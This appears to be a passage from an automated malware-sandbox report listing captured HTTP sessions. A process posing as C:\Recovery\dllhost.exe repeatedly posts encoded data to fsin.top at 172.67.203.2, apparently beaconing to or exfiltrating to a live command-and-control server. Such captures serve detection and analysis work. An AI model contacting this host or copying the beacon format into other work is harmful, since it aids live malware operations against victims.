                                                  Aug 1, 2024 07:37:48.208985090 CEST  1012  OUT  Data Raw: 54 57 58 57 5a 5c 58 54 5c 5e 5a 51 54 52 57 57 57 52 5e 59 56 5c 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TWXWZ\XT\^ZQTRWWWR^YV\Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"['!='&$?]2U=6*&(/S&?&3,!#Y%5&G#.X!4
                                                  Aug 1, 2024 07:37:48.311579943 CEST  25  IN  HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:48.541296959 CEST  590  IN  HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:48 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vmQ2Z84jbP9DZq8nZkE2N7oKBsyyg%2FOLHFkn1ACU7UV3VAzDvI%2FpUwj6A%2FilcbNRcuMKQU8mzVq%2F%2FdBCEkbUWqSfc4f6%2FNRdG1id9AwdvKs3szjPI7Sr9xQFhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a74ad874345-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                  31  192.168.2.4  49767  172.67.203.2  80  7288  C:\Recovery\dllhost.exe
                                                  Timestamp  Bytes transferred  Direction  Data
                                                  Aug 1, 2024 07:37:48.672827959 CEST  274  OUT  POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:49.021483898 CEST  1012  OUT  Data Raw: 51 54 58 51 5a 5c 5d 54 5c 5e 5a 51 54 50 57 55 57 57 5e 5c 56 59 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QTXQZ\]T\^ZQTPWUWW^\VYQ^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"0"[!-'5;Y<5*&5'('V2-&7-='X!;?\'%&G#.X!<
                                                  Aug 1, 2024 07:37:49.117490053 CEST  25  IN  HTTP/1.1 100 Continue


                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                  32  192.168.2.4  49768  172.67.203.2  80  7288  C:\Recovery\dllhost.exe
                                                  Timestamp  Bytes transferred  Direction  Data
                                                  Aug 1, 2024 07:37:49.251655102 CEST  274  OUT  POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:49.613605976 CEST  1284  OUT  Data Raw: 51 54 58 50 5a 5f 58 5c 5c 5e 5a 51 54 5e 57 55 57 55 5e 5c 56 54 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QTXPZ_X\\^ZQT^WUWU^\VTQ[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_'2!\5<]'&'X<>)&"]1%/=%3;=#^!%&G#.X!
                                                  Aug 1, 2024 07:37:49.701117039 CEST  25  IN  HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:49.961678982 CEST  733  IN  HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:49 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O4B2Xf5nXj9D%2BLSYUI6OtS07nU33dwJEMAE3sJAeA30CHQu%2FVc49TNybCpuYk0DWRQ6fO5ijzJD9MM91mxNs7O%2FxEuEKpLZj2oPuYiDk2QvKWbGkZJ5lgWcObg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a7d5fb88c71-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 21 08 26 2b 3e 50 21 5c 3b 0b 3d 31 36 0a 3e 23 38 19 28 5f 3b 58 32 05 36 01 26 16 05 0b 22 3c 29 5b 26 3f 2e 12 25 31 2a 5f 3d 27 21 51 04 11 25 03 37 33 3a 5f 2a 3a 3b 59 27 01 3f 59 34 18 02 11 27 1d 29 1c 21 17 30 5d 29 54 25 1e 3c 22 0d 56 2d 3b 0a 00 3c 0d 20 10 25 0c 2a 56 0d 17 22 51 39 38 28 1e 30 54 2f 0f 23 12 06 0f 21 3b 39 10 28 3f 36 10 29 1a 3a 5f 2d 1d 0d 12 2a 0a 22 51 2b 5b 3d 12 3c 14 0c 09 26 29 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98!&+>P!\;=16>#8(_;X26&"<)[&?.%1*_='!Q%73:_*:;Y'?Y4')!0])T%<"V-;< %*V"Q98(0T/#!;9(?6):_-*"Q+[=<&)"],-H=YM0


                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                  33  192.168.2.4  49769  172.67.203.2  80  7288  C:\Recovery\dllhost.exe
                                                  Timestamp  Bytes transferred  Direction  Data
                                                  Aug 1, 2024 07:37:49.405750036 CEST  274  OUT  POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:49.755928040 CEST  1012  OUT  Data Raw: 51 52 58 51 5a 55 5d 56 5c 5e 5a 51 54 5e 57 50 57 50 5e 5c 56 5c 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QRXQZU]V\^ZQT^WPWP^\V\QY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!':#>$$5#?.R)Y%,&/>$3?,./_#+42%&G#.X!
                                                  Aug 1, 2024 07:37:49.860584021 CEST  25  IN  HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:50.019757032 CEST  588  IN  HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:49 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=COmOzvSfSuZJte%2FpWL%2BYbBZj%2BiWhUlxGZwKzc9RFVuOGAQpgGgzXnjr3daRYdzISa6rYHI%2B8cIM6%2Fv9r2ENYGdFgBZ9CggFG3by5eiBLWysONpaeDf9CBonlyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a7e5f9b42ee-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                  34  192.168.2.4  49770  172.67.203.2  80  7288  C:\Recovery\dllhost.exe
                                                  Timestamp  Bytes transferred  Direction  Data
                                                  Aug 1, 2024 07:37:50.156806946 CEST  250  OUT  POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:37:50.505855083 CEST  1012  OUT  Data Raw: 54 50 58 54 5a 59 58 5d 5c 5e 5a 51 54 54 57 55 57 54 5e 5e 56 5c 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TPXTZYX]\^ZQTTWUWT^^V\Q^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_32&!+35]<;R?652;+&^%4,.#"^;%%&G#.X!,
                                                  Aug 1, 2024 07:37:50.604068041 CEST  25  IN  HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:50.837636948 CEST  584  IN  HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:50 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xpDX7gSpeN%2B4G064r8aZb4DlxsxBQzSLT6CRmIsO%2FglrE5OCZCg7ZtJjsBO5eLAwWLulJV4y%2FGzfzhOmeFloQF1nlbItpGnSO1LF6DlRflsmvJvpGFQKAPXEYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a82fc0543e2-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                  35  192.168.2.4  49771  172.67.203.2  80  7288  C:\Recovery\dllhost.exe
                                                  Timestamp  Bytes transferred  Direction  Data
                                                  Aug 1, 2024 07:37:50.970491886 CEST  274  OUT  POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:51.318335056 CEST  1012  OUT  Data Raw: 51 54 58 51 5f 58 5d 53 5c 5e 5a 51 54 57 57 50 57 5f 5e 5c 56 55 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QTXQ_X]S\^ZQTWWPW_^\VUQ\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"':6-8X$%#(+"U>5*Y%'W'/>_&V,"+'X15&G#.X!
                                                  Aug 1, 2024 07:37:51.419668913 CEST  25  IN  HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:51.658006907 CEST  580  IN  HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:51 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NSaoL4WRo0j6cP094htyu05FNSE%2FH3Wzw51bOiQzurbLiEKDEK6Bal1ET9LOoPjL29rqAq5Lm2uF34cYbJwnHJi3zPYjhmluYnucCTknm7U3tGIdnS5LMGEqhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a881def18ea-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0
                                                  Aug 1, 2024 07:37:51.878266096 CEST  580  IN  HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:51 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NSaoL4WRo0j6cP094htyu05FNSE%2FH3Wzw51bOiQzurbLiEKDEK6Bal1ET9LOoPjL29rqAq5Lm2uF34cYbJwnHJi3zPYjhmluYnucCTknm7U3tGIdnS5LMGEqhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a881def18ea-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                  36  192.168.2.4  49772  172.67.203.2  80  7288  C:\Recovery\dllhost.exe
                                                  Timestamp  Bytes transferred  Direction  Data
                                                  Aug 1, 2024 07:37:51.964507103 CEST  274  OUT  POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:52.318583012 CEST  1012  OUT  Data Raw: 54 50 5d 57 5a 5e 58 53 5c 5e 5a 51 54 50 57 55 57 54 5e 5e 56 5e 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TP]WZ^XS\^ZQTPWUWT^^V^Q][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"^$&#=?';(*U?&)&#V%$0<->#]"1&G#.X!<
                                                  Aug 1, 2024 07:37:52.414946079 CEST  25  IN  HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:52.666259050 CEST  586  IN  HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:52 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2FsPfR8wWrNyWnGFpWXfLDihOyNkNY2l5Ioq7K9omeqLbnatTfBtLpT2jEPVAHZU1lAL%2Bd9jJfp5%2BPhaAxjNJCOELO3%2BU8e7Li8zVopXKVCwTXK2dDLsuQBk8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a8e4eac2369-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                  37  192.168.2.4  49773  172.67.203.2  80  7288  C:\Recovery\dllhost.exe
                                                  Timestamp  Bytes transferred  Direction  Data
                                                  Aug 1, 2024 07:37:52.792702913 CEST  274  OUT  POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:53.146537066 CEST  1008  OUT  Data Raw: 51 50 5d 52 5a 5f 58 52 5c 5e 5a 51 54 56 57 50 57 50 5e 5d 56 54 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QP]RZ_XR\^ZQTVWPWP^]VTQY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"X3"!> Z'5/])81>6%/W%?>Z&37,-;_!+?1&G#.X!(
                                                  Aug 1, 2024 07:37:53.247885942 CEST  25  IN  HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:53.491926908 CEST  590  IN  HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:53 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ro2TiGM12Cy765WPgMI8yLJrRlbHnkXJ%2BubWFVEfjMpFgGnVd0GixKLDDD%2FG%2FjEk3dxOyOGNQM0gjqURhSNowaksKIQD%2FEQPlOdGa3IDCH8%2Fg0CrM%2BiQVBcSuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a938e93440c-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                  38  192.168.2.4  49774  172.67.203.2  80  7288  C:\Recovery\dllhost.exe
                                                  Timestamp  Bytes transferred  Direction  Data
                                                  Aug 1, 2024 07:37:53.628781080 CEST  274  OUT  POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:53.977945089 CEST  1012  OUT  Data Raw: 51 54 5d 55 5a 55 58 55 5c 5e 5a 51 54 5e 57 53 57 5f 5e 5f 56 5d 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QT]UZUXU\^ZQT^WSW_^_V]QZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"^'>!>(]$6,(>U?%)%(P&,)13$8> 54%&G#.X!
                                                  Aug 1, 2024 07:37:54.107278109 CEST  25  IN  HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:54.352653027 CEST  586  IN  HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:54 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rsG9zct8mhI14%2Febw%2FQMGrF9PT5KvSwObkRJGPXu82u6N4fTjoted7MVycOkg3sn3W%2FNwZdRSWBw7prNS7lw2GWUureG%2F0T0ut4a66IIOaFiPybquWPgQyb4zw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a98ee3b178c-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                  39  192.168.2.4  49775  172.67.203.2  80  7288  C:\Recovery\dllhost.exe
                                                  Timestamp  Bytes transferred  Direction  Data
                                                  Aug 1, 2024 07:37:54.638870955 CEST  274  OUT  POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive


                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                  40  192.168.2.4  49776  172.67.203.2  80  7288  C:\Recovery\dllhost.exe
                                                  Timestamp  Bytes transferred  Direction  Data
                                                  Aug 1, 2024 07:37:54.982044935 CEST  274  OUT  POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1272
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:55.333956957 CEST  1272  OUT  Data Raw: 51 52 58 56 5f 5f 58 57 5c 5e 5a 51 54 56 57 54 57 50 5e 56 56 5b 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QRXV__XW\^ZQTVWTWP^VV[Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"['"36;X?].).&(8&.$#3,. 54&5&G#.X!
                                                  Aug 1, 2024 07:37:55.427525997 CEST  25  IN  HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:55.687798023 CEST  737  IN  HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:55 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KeHCISLuF6%2BTCprG5jOzBqmf7chW%2Fynl9lTV8pwxQyWQwwRfH%2FlKjh9lNt1LCqnl7ndb5TFE9IRISiC68jzOA43ue53GTrldNbL%2Buu6nnS0NhOzCbgEfy%2FqxOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37aa12d9241d3-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 13 24 28 3e 51 36 39 20 51 3d 0b 21 1b 2a 23 2b 03 28 07 2f 5c 26 2f 36 00 31 5e 3c 57 21 3f 39 5b 24 3f 22 55 26 22 2d 06 3d 0d 21 51 04 11 26 5f 37 30 2d 04 2b 39 28 02 27 01 27 59 37 35 2c 12 30 33 22 0f 22 00 37 00 3e 32 25 13 28 1c 23 1e 2e 05 23 17 2b 1d 05 05 32 26 2a 56 0d 17 21 0f 2c 3b 38 51 24 32 0e 1c 23 3f 38 0e 20 15 39 11 29 11 2a 10 3e 27 26 5a 2e 23 20 02 29 55 21 0b 3c 13 25 1d 28 3a 2e 08 30 03 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"$(>Q69 Q=!*#+(/\&/61^<W!?9[$?"U&"-=!Q&_70-+9(''Y75,03""7>2%(#.#+2&*V!,;8Q$2#?8 9)*>'&Z.# )U!<%(:.0"],-H=YM0


                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                  41  192.168.2.4  49777  172.67.203.2  80  7288  C:\Recovery\dllhost.exe
                                                  Timestamp  Bytes transferred  Direction  Data
                                                  Aug 1, 2024 07:37:55.101027966 CEST  274  OUT  POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
